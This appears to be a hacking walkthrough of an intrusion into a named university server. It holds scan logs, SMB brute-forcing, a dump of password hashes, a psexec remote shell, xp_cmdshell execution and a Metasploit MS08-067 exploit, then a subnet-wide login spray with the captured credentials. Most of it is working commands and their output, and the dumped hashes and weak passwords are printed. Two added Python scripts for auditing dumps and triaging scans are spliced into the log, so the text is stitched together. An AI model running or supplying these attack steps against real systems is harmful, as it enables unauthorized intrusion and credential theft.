Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
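The pwdump lines above have the form user:RID => LMhash:NThash, and a defender auditing such a dump can read several weaknesses straight off the stored hashes without cracking anything: the NO PASSWORD token or the well-known empty-password hash means no password is set, a stored LM hash means the password is kept in the weak LanMan form, and an LM second half equal to the constant AAD3B435B51404EE means the password is at most 7 characters. The script below is an added example, not part of the original post; its sample input is the four smb-pwdump lines printed above.

```python
# Added example (not from the original post): audit a pwdump-style hash dump
# offline, without cracking. Input lines look like "user:RID => LMhash:NThash".
EMPTY_LM_HALF = "AAD3B435B51404EE"             # LM hash of an all-zero 7-byte half
EMPTY_LM = EMPTY_LM_HALF * 2                   # LM hash of the empty password
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of the empty password

# Sample input: the smb-pwdump lines printed in the scan above.
SAMPLE = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

def missing(h):
    # pwdump6 prints "NO PASSWORD***..." where no hash is stored for the account
    return h.startswith("NO PASSWORD")

def parse_line(line):
    """Return (user, rid, lm, nt) for one dump line, or None for other lines."""
    body = line.strip().lstrip("|_ ").strip()
    if "=>" not in body:
        return None
    account, hashes = body.split("=>", 1)
    user, rid = account.strip().rsplit(":", 1)
    lm, nt = hashes.strip().split(":", 1)
    return user, int(rid), lm.strip().upper(), nt.strip().upper()

def assess(rid, lm, nt):
    """List what the stored hashes give away about the account's password."""
    findings = []
    if missing(nt) or nt == EMPTY_NT:
        findings.append("empty password")
        if rid == 500:  # RID 500 is always the built-in Administrator
            findings.append("built-in Administrator has no password")
    elif not missing(lm) and lm != EMPTY_LM:
        # LM stored: uppercase-only DES over two 7-byte halves, trivially crackable
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:  # empty second half => at most 7 characters
            findings.append("password is 7 characters or shorter")
    return findings

def audit(text):
    """Map each user in the dump to (rid, findings)."""
    report = {}
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed:
            user, rid, lm, nt = parsed
            report[user] = (rid, assess(rid, lm, nt))
    return report
```

An LM hash of AAD3B435B51404EEAAD3B435B51404EE next to a real NT hash is not flagged, because it means either LM storage is disabled or the password is longer than 14 characters, and neither is a weakness.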

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
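Reading the host-script blocks above (smb-enum-shares, smb-brute and smb-check-vulns) by eye works for one host but not for a subnet sweep. The parser below is an added example, not part of the original post: it reads nmap's normal output, tracks which host and which script each "|" line belongs to, and turns anonymous share access, accepted logins and a VULNERABLE verdict into severity-tagged findings. The sample text is constructed in nmap's layout from the results shown on this page.

```python
# Added example (not from the original post): turn nmap SMB host-script output
# into severity-tagged findings for a whole sweep at once.
import re
# Constructed sample in nmap's normal-output layout, using the host-script
# lines the scans on this page printed.
SAMPLE = """\
Nmap scan report for bogon (202.103.242.241)
Host script results:
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.105
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
"""
HOST_RE = re.compile(r"\d+\.\d+\.\d+\.\d+")
VULN_RE = re.compile(r"^MS\d{2}-\d{3}: VULNERABLE")

def triage(text):
    """Return (severity, host, message) tuples for every SMB finding in the output."""
    findings, host, script, share = [], None, None, None
    for raw in text.splitlines():
        if raw.startswith("Nmap scan report for"):   # new host: reset per-host state
            host, script = HOST_RE.search(raw).group(0), None
            continue
        if not raw.startswith("|"):                  # only host-script lines matter here
            continue
        body = raw.lstrip("|_ ").strip()
        if body.startswith("smb-") and body.endswith(":"):
            script = body[:-1]                       # header line names the script
        elif script == "smb-enum-shares":
            if body.startswith("Anonymous access:"):
                access = body.split(":", 1)[1].strip()
                if access != "<none>":
                    findings.append(("high", host, f"anonymous {access} on {share}"))
            else:
                share = body                         # a bare line is the share name
        elif script == "smb-brute" and body.endswith("Login was successful"):
            user, pw = body.split(" =>", 1)[0].split(":", 1)
            blank = pw == "<blank>"
            findings.append(("critical" if blank else "high", host, f"{user}: {'empty' if blank else 'guessable'} password accepted"))
        elif script == "smb-check-vulns" and VULN_RE.match(body):
            findings.append(("critical", host, body.split(":", 1)[0] + " unpatched"))
    return findings
```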

root@bt:~# msfconsole   // exploit the MS08-067 vulnerability against the target from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames together with the captured hash against the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~